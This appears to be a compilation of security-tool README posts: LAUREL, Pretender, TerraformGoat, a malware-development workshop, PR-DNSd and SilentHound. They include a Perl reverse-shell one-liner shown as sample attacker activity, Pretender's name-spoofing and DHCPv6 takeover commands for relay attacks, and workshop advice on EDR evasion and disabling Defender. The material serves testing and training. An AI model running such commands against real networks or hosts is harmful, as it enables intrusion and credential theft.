-v /sys/fs/bpf:/sys/fs/bpf linuxlock/bpflock

Passing environment variables can also be done with files using --env-file. All parameters can be passed as environment variables using the BPFLOCK_$VARIABLE_NAME=VALUE format.

Example run with environment variables in a file:

docker run --name bpflock -it --rm --cgroupns=host --pid=host --privileged \
--env-file bpflock.env.list \
-v /sys/kernel/:/sys/kernel/ \
-v /sys/fs/bpf:/sys/fs/bpf linuxlock/bpflock

4. Documentation

Documentation files can be found here.

5. Build

bpflock uses docker BuildKit to build and Golang to make some checks and run tests. bpflock is built inside an Ubuntu container that downloads the standard golang package.

Run the following to build the bpflock docker container:

git submodule update --init --recursive
make

Bpf programs are built using libbpf. The docker image used is Ubuntu.

If you want to only build the bpf programs directly without using docker, then on Ubuntu:

sudo apt install -y pkg-config bison binutils-dev build-essential \
flex libc6-dev clang-12 libllvm12 llvm-12-dev libclang-12-dev \
zlib1g-dev libelf-dev libfl-dev gcc-multilib zlib1g-dev \
libcap-dev libiberty-dev libbfd-dev

Then run:

make bpf-programs

In this case the generated programs will be inside the ./bpf/build/... directory.

Credits

bpflock uses a lot of resources including source code from the Cilium and bcc projects.

License

The bpflock user space components are licensed under the Apache License, Version 2.0. The BPF code where it is noted is licensed under the General Public License, Version 2.0.



Laurel - Transform Linux Audit Logs For SIEM Usage



LAUREL is an event post-processing plugin for auditd(8) to improve its usability in modern security monitoring setups.


Why?

TLDR: Instead of audit events that look like this…

type=EXECVE msg=audit(1626611363.720:348501): argc=3 a0="perl" a1="-e" a2=75736520536F636B65743B24693D2231302E302E302E31223B24703D313233343B736F636B65742…

…turn them into JSON logs where the mess that your pen testers/red teamers/attackers are trying to make becomes apparent at first glance:

{ … "EXECVE":{ "argc": 3,"ARGV": ["perl", "-e", "use Socket;$i=\"10.0.0.1\";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};"]}, …}

This happens at the source. The generated event even contains useful information about the spawning process:

"PARENT_INFO":{"ID":"1643635026.276:327308","comm":"sh","exe":"/usr/bin/dash","ppid":3190631}

Description

Logs produced by the Linux Audit subsystem and auditd(8) contain information that can be very useful in a SIEM context (if a useful rule set has been configured). However, the format is not well-suited for at-scale analysis: Events are usually split across different lines that have to be merged using a message identifier. Files and program executions are logged via PATH and EXECVE elements, but a limited character set for strings causes many of those entries to be hex-encoded. For a more detailed discussion, see Practical auditd(8) problems.

LAUREL solves these problems by consuming audit events, parsing and transforming them into more data and writing them out as a JSON-based log format, while keeping all information intact that was part of the original audit log. It does not replace auditd(8) as the consumer of audit messages from the kernel. Instead, it uses the audisp ("audit dispatch") interface to receive messages via auditd(8). Therefore, it can peacefully coexist with other consumers of audit events (e.g. some EDR products).

Refer to JSON-based log format for a description of the log format.

We developed this tool because we were not content with feature sets and performance characteristics of existing projects and products. Please refer to Performance for details.

A word about audit rules

A good starting point for an audit ruleset is https://github.com/Neo23x0/auditd, but generally speaking, any ruleset will do. LAUREL will currently only work as designed if End Of Event records are not suppressed, so rules like

-a always,exclude -F msgtype=EOE

should be removed.

Events with context

Every event that is caused by a syscall or filesystem rule is annotated with information about the parent of the process that caused the event. If available, id points to the message corresponding to the last execve syscall for this process:

"PARENT_INFO": {
"ID": "1643635026.276:327308",
"comm": "sh",
"exe": "/usr/bin/dash",
"ppid": 1532
}

Adding more context: Keys and process labels

Audit events can contain a key, a short string that can be used to filter events. LAUREL can be configured to recognize such keys and add them as labels to the process that caused the event. These labels can also be propagated to child processes. This is useful to avoid expensive JOIN-like operations in log analysis to filter out harmless events.

Consider the following rule that sets keys for apt and dpkg invocations:

-w /usr/bin/apt-get -p x -k software_mgmt

Let's configure LAUREL to turn the software_mgmt key into a process label that is propagated to child processes:
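
A sketch of what that configuration could look like, assuming the [label-process] section of LAUREL's config.toml (the exact key names are an assumption here, so verify them against the LAUREL documentation):

[label-process]
# turn the audit key "software_mgmt" into a label on the originating process (assumed option name)
label-keys = [ "software_mgmt" ]
# propagate the label to child processes (assumed option name)
propagate-labels = [ "software_mgmt" ]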

Together with a ruleset that logs execve(2) and variants, this will cause every event directly caused by apt-get and its subprocesses to be labelled software_mgmt.

For example, running sudo apt-get update on a Debian/bullseye system with a few sources configured, the following subprocesses labelled software_mgmt can be observed in LAUREL's audit log:

  • apt-get update
  • /usr/bin/dpkg --print-foreign-architectures
  • /usr/lib/apt/methods/http
  • /usr/lib/apt/methods/https
  • /usr/lib/apt/methods/https
  • /usr/lib/apt/methods/http
  • /usr/lib/apt/methods/gpgv
  • /usr/lib/apt/methods/gpgv
  • /usr/bin/dpkg --print-foreign-architectures
  • /usr/bin/dpkg --print-foreign-architectures

This sort of tracking also works for package installation or removal. If some package's post-installation script is behaving suspiciously, a SIEM analyst will be able to make the connection to the software installation process by inspecting the single event.

Installation

See INSTALL.md.

License

GNU General Public License, version 3

Authors

The logo was created by Birgit Meyer <hello@biggi.io>.




Pretender - Your MitM Sidekick For Relaying Attacks Featuring DHCPv6 DNS Takeover As Well As mDNS, LLMNR And NetBIOS-NS Spoofing


Your MitM sidekick for relaying attacks featuring DHCPv6 DNS takeover
as well as mDNS, LLMNR and NetBIOS-NS spoofing


pretender is a tool developed by RedTeam Pentesting to obtain machine-in-the-middle positions via spoofed local name resolution and DHCPv6 DNS takeover attacks. pretender primarily targets Windows hosts, as it is intended to be used for relaying attacks but can be deployed on Linux, Windows and all other platforms Go supports. Name resolution queries can be answered with arbitrary IPs for situations where the relaying tool runs on a different host than pretender. It is designed to work with tools such as Impacket's ntlmrelayx.py and krbrelayx that handle the incoming connections for relaying attacks or hash dumping.

Read our blog post for more information about DHCPv6 DNS takeover, local name resolution spoofing and relay attacks.


Usage

To get a feel for the situation in the local network, pretender can be started in --dry mode where it only logs incoming queries and does not answer any of them:

pretender -i eth0 --dry
pretender -i eth0 --dry --no-ra # without router advertisements

To perform local name resolution spoofing via mDNS, LLMNR and NetBIOS-NS as well as a DHCPv6 DNS takeover with router advertisements, simply run pretender like this:

pretender -i eth0

You can disable certain attacks with --no-dhcp-dns (disables DHCPv6, DNS and router advertisements), --no-lnr (disables mDNS, LLMNR and NetBIOS-NS), --no-mdns, --no-llmnr, --no-netbios and --no-ra.

If ntlmrelayx.py runs on a different host (say 10.0.0.10/fe80::5), run pretender like this:

pretender -i eth0 -4 10.0.0.10 -6 fe80::5

Pretender can be set up to only respond to queries for certain domains (or all but certain domains), and it can perform the spoofing attacks only for certain hosts (or all but certain hosts). Referencing hosts by hostname relies on the name resolution of the host that runs pretender. See the following example:

pretender -i eth0 --spoof example.com --dont-spoof-for 10.0.0.3,host1.corp,fe80::f --ignore-nofqdn

For more information, run pretender --help.


Tips

  • Make sure to enable IPv6 support in ntlmrelayx.py with the -6 flag
  • Pretender can be configured to stop after a certain time period for situations where it cannot be aborted manually (--stop-after and main.vendorStopAfter)
  • Host info lookup (which relies on the ARP table, IP neighbours and reverse lookups) can be disabled with --no-host-info or main.vendorNoHostInfo
  • If you are not sure which interface to choose (especially on Windows), list all interfaces with names and addresses using --interfaces
  • If you want to exclude hosts from local name resolution spoofing, make sure to also exclude their IPv6 addresses or use --no-ipv6-lnr/main.vendorNoIPv6LNR
  • DHCPv6 messages usually contain a FQDN option (which can also sometimes contain a hostname which is not a FQDN). This option is used to filter out messages by hostname (--spoof-for/--dont-spoof-for). You can decide what to do with DHCPv6 messages without FQDN option by setting or omitting --ignore-nofqdn
  • Depending on the build configuration, either the operating system resolver (CGO_ENABLED=1) or a Go implementation (CGO_ENABLED=0) is used. This can be important for host info collection because the OS resolver may support local name resolution and the Go implementation does not, unless a stub resolver is used.
  • The host info functionality is currently only available for Windows and Linux.
  • A custom MAC address vendor list can be compiled into the binary by replacing the default list hostinfo/mac-vendors.txt. Only lines with MAC prefixes in the following format are recognized: FF:FF:FF<tab>VendorID<tab>Vendor (the MAC prefix length can be arbitrary).
  • If you only want to perform Kerberos relaying you can specify --no-lnr and --spoof-types SOA to ignore any queries that are unrelated to the attack.
  • When conducting a Kerberos relay attack where krbrelayx.py runs on a different host than pretender (relay IPv4 address points to different host that runs krbrelayx.py), the host running krbrelayx.py will also need to run pretender in order to receive and deny the Dynamic Update query sent to the relay IPv4 address.

Building and Vendoring

Pretender can be built as follows:

go build

Pretender can also be compiled with pre-configured settings. For this, the ldflags have to be modified like this:

-ldflags '-X main.vendorInterface=eth1'

For example, Pretender can be built for Windows with a specific default interface, without colored output and with a relay IPv4 address configured:

GOOS=windows go build -trimpath -ldflags '-X "main.vendorInterface=Ethernet 2" -X main.vendorNoColor=true -X main.vendorRelayIPv4=10.0.0.10'

Full list of vendoring options (see defaults.go or pretender --help for detailed information):

vendorInterface
vendorRelayIPv4
vendorRelayIPv6
vendorSOAHostname
vendorNoDHCPv6DNSTakeover
vendorNoDHCPv6
vendorNoDNS
vendorNoMDNS
vendorNoNetBIOS
vendorNoLLMNR
vendorNoLocalNameResolution
vendorNoRA
vendorNoIPv6LNR
vendorSpoof
vendorDontSpoof
vendorSpoofFor
vendorDontSpoofFor
vendorSpoofTypes
vendorIgnoreDHCPv6NoFQDN
vendorDryMode
vendorTTL
vendorLeaseLifetime
vendorRARouterLifetime
vendorRAPeriod
vendorStopAfter
vendorVerbose
vendorNoColor
vendorNoTimestamps
vendorLogFileName
vendorNoHostInfo
vendorHideIgnored
vendorRedirectStderr
vendorListInterfaces


TerraformGoat - "Vulnerable By Design" Multi Cloud Deployment Tool



TerraformGoat is selefra research lab's "Vulnerable by Design" multi cloud deployment tool.

Currently supported cloud vendors include Alibaba Cloud, Tencent Cloud, Huawei Cloud, Amazon Web Services, Google Cloud Platform, Microsoft Azure.


Scenarios

ID | Cloud Service Company | Types Of Cloud Services | Vulnerable Environment
1 | Alibaba Cloud | Networking | VPC Security Group Open All Ports
2 | Alibaba Cloud | Networking | VPC Security Group Open Common Ports
3 | Alibaba Cloud | Object Storage | Bucket HTTP Enable
4 | Alibaba Cloud | Object Storage | Object ACL Writable
5 | Alibaba Cloud | Object Storage | Object ACL Readable
6 | Alibaba Cloud | Object Storage | Special Bucket Policy
7 | Alibaba Cloud | Object Storage | Bucket Public Access
8 | Alibaba Cloud | Object Storage | Object Public Access
9 | Alibaba Cloud | Object Storage | Bucket Logging Disable
10 | Alibaba Cloud | Object Storage | Bucket Policy Readable
11 | Alibaba Cloud | Object Storage | Bucket Object Traversal
12 | Alibaba Cloud | Object Storage | Unrestricted File Upload
13 | Alibaba Cloud | Object Storage | Server Side Encryption No KMS Set
14 | Alibaba Cloud | Object Storage | Server Side Encryption Not Using BYOK
15 | Alibaba Cloud | Elastic Computing Service | ECS SSRF
16 | Alibaba Cloud | Elastic Computing Service | ECS Unattached Disks Are Unencrypted
17 | Alibaba Cloud | Elastic Computing Service | ECS Virtual Machine Disks Are Unencrypted
18 | Tencent Cloud | Networking | VPC Security Group Open All Ports
19 | Tencent Cloud | Networking | VPC Security Group Open Common Ports
20 | Tencent Cloud | Object Storage | Bucket ACL Writable
21 | Tencent Cloud | Object Storage | Bucket ACL Readable
22 | Tencent Cloud | Object Storage | Bucket Public Access
23 | Tencent Cloud | Object Storage | Object Public Access
24 | Tencent Cloud | Object Storage | Unrestricted File Upload
25 | Tencent Cloud | Object Storage | Bucket Object Traversal
26 | Tencent Cloud | Object Storage | Bucket Logging Disable
27 | Tencent Cloud | Object Storage | Server Side Encryption Disable
28 | Tencent Cloud | Elastic Computing Service | CVM SSRF
29 | Tencent Cloud | Elastic Computing Service | CBS Storage Are Not Used
30 | Tencent Cloud | Elastic Computing Service | CVM Virtual Machine Disks Are Unencrypted
31 | Huawei Cloud | Networking | ECS Unsafe Security Group
32 | Huawei Cloud | Object Storage | Object ACL Writable
33 | Huawei Cloud | Object Storage | Special Bucket Policy
34 | Huawei Cloud | Object Storage | Unrestricted File Upload
35 | Huawei Cloud | Object Storage | Bucket Object Traversal
36 | Huawei Cloud | Object Storage | Wrong Policy Causes Arbitrary File Uploads
37 | Huawei Cloud | Elastic Computing Service | ECS SSRF
38 | Huawei Cloud | Relational Database Service | RDS Mysql Baseline Checking Environment
39 | Amazon Web Services | Networking | VPC Security Group Open All Ports
40 | Amazon Web Services | Networking | VPC Security Group Open Common Ports
41 | Amazon Web Services | Object Storage | Object ACL Writable
42 | Amazon Web Services | Object Storage | Bucket ACL Writable
43 | Amazon Web Services | Object Storage | Bucket ACL Readable
44 | Amazon Web Services | Object Storage | MFA Delete Is Disable
45 | Amazon Web Services | Object Storage | Special Bucket Policy
46 | Amazon Web Services | Object Storage | Bucket Object Traversal
47 | Amazon Web Services | Object Storage | Unrestricted File Upload
48 | Amazon Web Services | Object Storage | Bucket Logging Disable
49 | Amazon Web Services | Object Storage | Bucket Allow HTTP Access
50 | Amazon Web Services | Object Storage | Bucket Default Encryption Disable
51 | Amazon Web Services | Elastic Computing Service | EC2 SSRF
52 | Amazon Web Services | Elastic Computing Service | Console Takeover
53 | Amazon Web Services | Elastic Computing Service | EBS Volumes Are Not Used
54 | Amazon Web Services | Elastic Computing Service | EBS Volumes Encryption Is Disabled
55 | Amazon Web Services | Elastic Computing Service | Snapshots Of EBS Volumes Are Unencrypted
56 | Amazon Web Services | Identity and Access Management | IAM Privilege Escalation
57 | Google Cloud Platform | Object Storage | Object ACL Writable
58 | Google Cloud Platform | Object Storage | Bucket ACL Writable
59 | Google Cloud Platform | Object Storage | Bucket Object Traversal
60 | Google Cloud Platform | Object Storage | Unrestricted File Upload
61 | Google Cloud Platform | Elastic Computing Service | VM Command Execution
62 | Microsoft Azure | Object Storage | Blob Public Access
63 | Microsoft Azure | Object Storage | Container Blob Traversal
64 | Microsoft Azure | Elastic Computing Service | VM Command Execution


Install

TerraformGoat is deployed using Docker images and therefore requires Docker Engine support. Docker Engine installation instructions can be found at https://docs.docker.com/engine/install/

Depending on the cloud service provider you are using, choose the corresponding installation command.

Alibaba Cloud

docker pull registry.cn-beijing.aliyuncs.com/huoxian_pub/terraformgoat_aliyun:0.0.4
docker run -itd --name terraformgoat_aliyun_0.0.4 registry.cn-beijing.aliyuncs.com/huoxian_pub/terraformgoat_aliyun:0.0.4
docker exec -it terraformgoat_aliyun_0.0.4 /bin/bash

Tencent Cloud

docker pull registry.cn-beijing.aliyuncs.com/huoxian_pub/terraformgoat_tencentcloud:0.0.4
docker run -itd --name terraformgoat_tencentcloud_0.0.4 registry.cn-beijing.aliyuncs.com/huoxian_pub/terraformgoat_tencentcloud:0.0.4
docker exec -it terraformgoat_tencentcloud_0.0.4 /bin/bash

Huawei Cloud

docker pull registry.cn-beijing.aliyuncs.com/huoxian_pub/terraformgoat_huaweicloud:0.0.4
docker run -itd --name terraformgoat_huaweicloud_0.0.4 registry.cn-beijing.aliyuncs.com/huoxian_pub/terraformgoat_huaweicloud:0.0.4
docker exec -it terraformgoat_huaweicloud_0.0.4 /bin/bash

Amazon Web Services

docker pull registry.cn-beijing.aliyuncs.com/huoxian_pub/terraformgoat_aws:0.0.4
docker run -itd --name terraformgoat_aws_0.0.4 registry.cn-beijing.aliyuncs.com/huoxian_pub/terraformgoat_aws:0.0.4
docker exec -it terraformgoat_aws_0.0.4 /bin/bash

Google Cloud Platform

docker pull registry.cn-beijing.aliyuncs.com/huoxian_pub/terraformgoat_gcp:0.0.4
docker run -itd --name terraformgoat_gcp_0.0.4 registry.cn-beijing.aliyuncs.com/huoxian_pub/terraformgoat_gcp:0.0.4
docker exec -it terraformgoat_gcp_0.0.4 /bin/bash

Microsoft Azure

docker pull registry.cn-beijing.aliyuncs.com/huoxian_pub/terraformgoat_azure:0.0.4
docker run -itd --name terraformgoat_azure_0.0.4 registry.cn-beijing.aliyuncs.com/huoxian_pub/terraformgoat_azure:0.0.4
docker exec -it terraformgoat_azure_0.0.4 /bin/bash


Demo

After entering the container, cd into the corresponding scenario directory to start deploying that scenario.

Here is a demonstration of the Alibaba Cloud Bucket Object Traversal scenario build.

docker pull registry.cn-beijing.aliyuncs.com/huoxian_pub/terraformgoat_aliyun:0.0.4
docker run -itd --name terraformgoat_aliyun_0.0.4 registry.cn-beijing.aliyuncs.com/huoxian_pub/terraformgoat_aliyun:0.0.4
docker exec -it terraformgoat_aliyun_0.0.4 /bin/bash


 

cd /TerraformGoat/aliyun/oss/bucket_object_traversal/
aliyun configure
terraform init
terraform apply



When the program prompts Enter a value:, type yes and press Enter. Once the deployment finishes, use curl to access the bucket and you can see the objects being traversed.
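
As a sketch of that check, an unauthenticated listing request against the deployed bucket returns an XML listing of its objects. The bucket address below is a placeholder; substitute the URL printed in the terraform apply output:

# Placeholder bucket address - use the URL from the terraform output
curl "http://your-bucket-name.oss-cn-beijing.aliyuncs.com/"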



To avoid the cloud service continuing to incur charges, remember to destroy the scenario promptly after you finish using it.

terraform destroy

Uninstall

If you are inside the container, first run the exit command to return to the host, and then execute the following commands on the host.

docker stop $(docker ps -a -q -f "name=terraformgoat*")
docker rm $(docker ps -a -q -f "name=terraformgoat*")
docker rmi $(docker images -a -q -f "reference=registry.cn-beijing.aliyuncs.com/huoxian_pub/terraformgoat*")
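
To confirm the cleanup, re-run the same filters; both commands should return no results:

docker ps -a -q -f "name=terraformgoat*"
docker images -a -q -f "reference=registry.cn-beijing.aliyuncs.com/huoxian_pub/terraformgoat*"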

Notice

  1. The README of each vulnerable environment is meant to be executed inside the TerraformGoat container, so the TerraformGoat container environment needs to be deployed first.
  2. Because some scenarios carry a risk of lateral movement within the cloud intranet, it is strongly recommended that users configure the scenarios with dedicated test accounts, avoid using production-environment cloud accounts, and install TerraformGoat via the Dockerfile to isolate their local cloud vendor tokens from the test account tokens.
  3. TerraformGoat is for educational purposes only. It must not be used for illegal or criminal purposes; any consequences arising from the use of TerraformGoat are the responsibility of the user, not the Selefra organization.


Contributing

Contributions are welcome and greatly appreciated. See CONTRIBUTING.md for details on the contribution workflow.

License

TerraformGoat is under the Apache 2.0 license. See the LICENSE file for details.



Maldev-For-Dummies - A Workshop About Malware Development



In the age of EDR, red team operators cannot get away with using pre-compiled payloads anymore. As such, malware development is becoming a vital skill for any operator. Getting started with maldev may seem daunting, but is actually very easy. This workshop will show you all you need to get started!

This repository contains the slides and accompanying exercises for the 'MalDev for Dummies' workshop that will be facilitated at Hack in Paris 2022 (additional conferences TBA). The exercises will remain available here to be completed at your own pace - the learning process should never be rushed! Issues and pull requests to this repo with questions and/or suggestions are welcomed.

Disclaimer: Malware development is a skill that can -and should- be used for good, to further the field of (offensive) security and keep our defenses sharp. If you ever use this skillset to perform activities that you have no authorization for, you are a bigger dummy than this workshop is intended for and you should skidaddle on out of here.

 

Workshop Description

With antivirus (AV) and Endpoint Detection and Response (EDR) tooling becoming more mature by the minute, the red team is being forced to stay ahead of the curve. Gone are the times of execute-assembly and dropping unmodified payloads on disk - if you want your engagements to last longer than a week you will have to step up your payload creation and malware development game. Starting out in this field can be daunting however, and finding the right resources is not always easy.

This workshop is aimed at beginners in the space and will guide you through your first steps as a malware developer. It is aimed primarily at offensive practitioners, but defensive practitioners are also very welcome to attend and broaden their skillset.

During the workshop we will go over some theory, after which we will set you up with a lab environment. There will be various exercises that you can complete depending on your current skillset and level of comfort with the subject. However, the aim of the workshop is to learn, and explicitly not to complete all the exercises. You are free to choose your preferred programming language for malware development, but support during the workshop is provided primarily for the C# and Nim programming languages.

During the workshop, we will discuss the key topics required to get started with building your own malware. This includes (but is not limited to):

  • The Windows API
  • Filetypes and execution methods
  • Shellcode execution and injection
  • AV and EDR evasion methods

Getting Started

To get started with malware development, you will need a dev machine so that you are not bothered by any defensive tooling that may run on your host machine. I prefer Windows for development, but Linux or macOS will do just fine. Install your IDE of choice (I use VS Code for almost everything except C#, for which I use Visual Studio), and then install the toolchains required for your MalDev language of choice:

  • C#: Visual Studio will give you the option to include the .NET packages you will need to develop C#. If you want to develop without Visual Studio, you can download the .NET Framework separately.
  • Nim lang: Follow the download instructions. Choosenim is a convenient utility that can be used to automate the installation process.
  • Golang (not supported during workshop): Follow the download instructions.
  • Rust (not supported during workshop): Rustup can be used to install Rust along with the required toolchains.

Don't forget to disable Windows Defender or add the appropriate exclusions, so your hard work doesn't get quarantined!
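
As a minimal sketch, an exclusion can be added from an elevated PowerShell prompt; the C:\MalDev folder below is just an example path for your projects:

# Run elevated; excludes the (example) C:\MalDev folder from Defender scanning
Add-MpPreference -ExclusionPath "C:\MalDev"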

Note: Oftentimes, package managers such as apt or software management tools such as Chocolatey can be used to automate the installation and management of dependencies in a convenient and repeatable way. Be conscious however that versions in package managers are often behind on the real thing! Below is an example Chocolatey command to install the mentioned tooling all at once.
 choco install -y nim choosenim go rust vscode visualstudio2019community dotnetfx

Compiling programs

Both C# and Nim are compiled languages, meaning that a compiler is used to translate your source code into binary executables of your chosen format. The process of compilation differs per language.

C#

C# code (.cs files) can either be compiled directly (with the csc utility) or via Visual Studio itself. Most source code in this repo (except the solution to bonus exercise 3) can be compiled as follows.

Note: Make sure you run the below command in a "Visual Studio Developer Command Prompt" so it knows where to find csc; it is recommended to use the "x64 Native Tools Command Prompt" for your version of Visual Studio.
csc /unsafe filename.cs

You can enable compile-time optimizations with the /optimize flag. You can hide the console window by adding /target:winexe as well, or compile as DLL with /target:library (but make sure your code structure is suitable for this).
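
For example, an optimized build without a console window can be produced by combining these flags:

csc /unsafe /optimize /target:winexe filename.cs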

Nim

Nim code (.nim files) is compiled with the nim c command. The source code in this repo can be compiled as follows.

nim c filename.nim

If you want to optimize your build for size and strip debug information (much better for opsec!), you can add the following flags.

nim c -d:release -d:strip --opt:size filename.nim

Optionally you can hide the console window by adding --app:gui as well.
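
Combining all of the above, a stripped release build without a console window would be:

nim c -d:release -d:strip --opt:size --app:gui filename.nim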

Dependencies

Nim

Most Nim programs depend on a library called "Winim" to interface with the Windows API. You can install the library with the Nimble package manager as follows (after installing Nim):

nimble install winim

Resources

The workshop slides reference some resources that you can use to get started. Additional resources are listed in the README.md files for every exercise!



PR-DNSd - Passive-Recursive DNS Daemon



Passive-Recursive DNS daemon.


Quickstart

go get github.com/korc/PR-DNSd
sudo setcap cap_net_bind_service,cap_sys_chroot=ep go/bin/PR-DNSd
go/bin/PR-DNSd -upstream 9.9.9.9:53 -listen 127.0.0.1:53
echo nameserver 127.0.0.1 | sudo tee /etc/resolv.conf
dig google.com
dig -x $(dig +short google.com)

If you can't use setcap, you will have to use the -chroot "" and -listen :<high_port> options, or run as root.
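
For instance, a rootless setup without setcap might look like this (port 5353 is an arbitrary high port; clients must then be pointed at it explicitly):

go/bin/PR-DNSd -chroot "" -listen :5353 -upstream 9.9.9.9:53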

Use cases

  • run as local host DNS service, to fix your netstat/tcpview/lsof etc. output
  • as enterprise-internal DNS server, to also be able to do meaningful EDR/IR and log analysis
  • as cloud service, to also collect Passive DNS data from non-enterprise (home, BYOD etc.) devices
    • hint: you probably want to configure DDoS protection options
  • in cloud as DNS-over-TLS server, to additionally provide private DNS for supporting devices (ex: Android 9's private DNS setting)
    • ex: domain pattern based firewall/proxy configuration for mobile devices

Running as your own private server for Android 9's Private DNS settings

After appropriate setcap, run:

PR-DNSd -tlslisten :853 -cert YOUR_SERVER_CRT_KEY_PEM -upstream 1.1.1.1:53 -store pr-dnsd

Options

-cert string
      TCP-TLS listener certificate (required for TLS listener)
-chroot string
      chroot to directory after start (default "/var/tmp")
-count int
      Count of replies allowed before the debounce delay is applied (default 100)
-ctmout string
      Client timeout for upstream queries
-debounce string
      Required time duration between UDP replies to a single IP to prevent DoS (default "200ms")
-key string
      TCP-TLS certificate key (default: same as -cert value)
-listen string
      Listen address (default ":53")
-silent
      Don't report normal data
-store string
      Store PTR data to specified file
-tlslisten string
      TCP-TLS listener address (default ":853")
-upstream string
      Upstream DNS server (tcp-tls:// prefix for DoT) (default "1.1.1.1:53")

(With TLS and chroot, ensure ca-certificates and resolv.conf inside the chroot are properly set up.)
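
As an example of the tcp-tls:// upstream prefix, the following sketch (the certificate path is hypothetical) serves DoT clients while also forwarding queries upstream over DoT:

PR-DNSd -tlslisten :853 -cert /path/to/server_crt_key.pem -upstream tcp-tls://1.1.1.1:853 -store pr-dnsd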


SilentHound - Quietly Enumerate An Active Directory Domain Via LDAP Parsing Users, Admins, Groups, Etc.



Quietly enumerate an Active Directory Domain via LDAP parsing users, admins, groups, etc. Created by Nick Swink from Layer 8 Security.


Installation

Using pipenv (recommended method)

sudo python3 -m pip install --user pipenv
git clone https://github.com/layer8secure/SilentHound.git
cd SilentHound
pipenv install

This will create an isolated virtual environment with dependencies needed for the project. To use the project you can either open a shell in the virtualenv with pipenv shell or run commands directly with pipenv run.

From requirements.txt (legacy)

This method is not recommended because python-ldap can cause many dependency errors.

Install dependencies with pip:

python3 -m pip install -r requirements.txt
python3 silenthound.py -h

Usage

$ pipenv run python silenthound.py -h
usage: silenthound.py [-h] [-u USERNAME] [-p PASSWORD] [-o OUTPUT] [-g] [-n] [-k] TARGET domain

Quietly enumerate an Active Directory environment.

positional arguments:
  TARGET                Domain Controller IP
  domain                Dot (.) separated Domain name including both contexts
                        e.g. ACME.com / HOME.local / htb.net

optional arguments:
  -h, --help            show this help message and exit
  -u USERNAME, --username USERNAME
                        LDAP username - not the same as user principal name.
                        E.g. Username: bob.dole might be 'bob dole'
  -p PASSWORD, --password PASSWORD
                        LDAP password - use single quotes 'password'
  -o OUTPUT, --output OUTPUT
                        Name for output files. Creates output files for hosts,
                        users, domain admins, and descriptions in the current
                        working directory.
  -g, --groups          Display Group names with user members.
  -n, --org-unit        Display Organizational Units.
  -k, --keywords        Search for key words in LDAP objects.

About

A lightweight tool to quickly and quietly enumerate an Active Directory environment. The goal of this tool is to get a Lay of the Land whilst making as little noise on the network as possible. The tool will make one LDAP query that is used for parsing, and create a cache file to prevent further queries/noise on the network. If no credentials are passed it will attempt anonymous BIND.
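
For example, an authenticated run using all of the output flags might look like this (the IP address, domain, and credentials below are placeholders):

pipenv run python silenthound.py -u 'bob dole' -p 'Password1!' -o acme -g -n -k 10.10.10.5 ACME.com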

Using the -o flag writes each section that is normally printed to stdout to its own output file. When all flags are used, the files created will be:

-rw-r--r--  1 kali  kali   122 Jun 30 11:37 BASENAME-descriptions.txt
-rw-r--r--  1 kali  kali    60 Jun 30 11:37 BASENAME-domain_admins.txt
-rw-r--r--  1 kali  kali  2620 Jun 30 11:37 BASENAME-groups.txt
-rw-r--r--  1 kali  kali    89 Jun 30 11:37 BASENAME-hosts.txt
-rw-r--r--  1 kali  kali  1940 Jun 30 11:37 BASENAME-keywords.txt
-rw-r--r--  1 kali  kali    66 Jun 30 11:37 BASENAME-org.txt
-rw-r--r--  1 kali  kali   529 Jun 30 11:37 BASENAME-users.txt

Author

Nick Swink from Layer 8 Security

Roadmap

  • Parse users belonging to specific OUs
  • Refine output
  • Continuously cleanup code
  • Move towards OOP

For additional feature requests please submit an issue and add the enhancement tag.


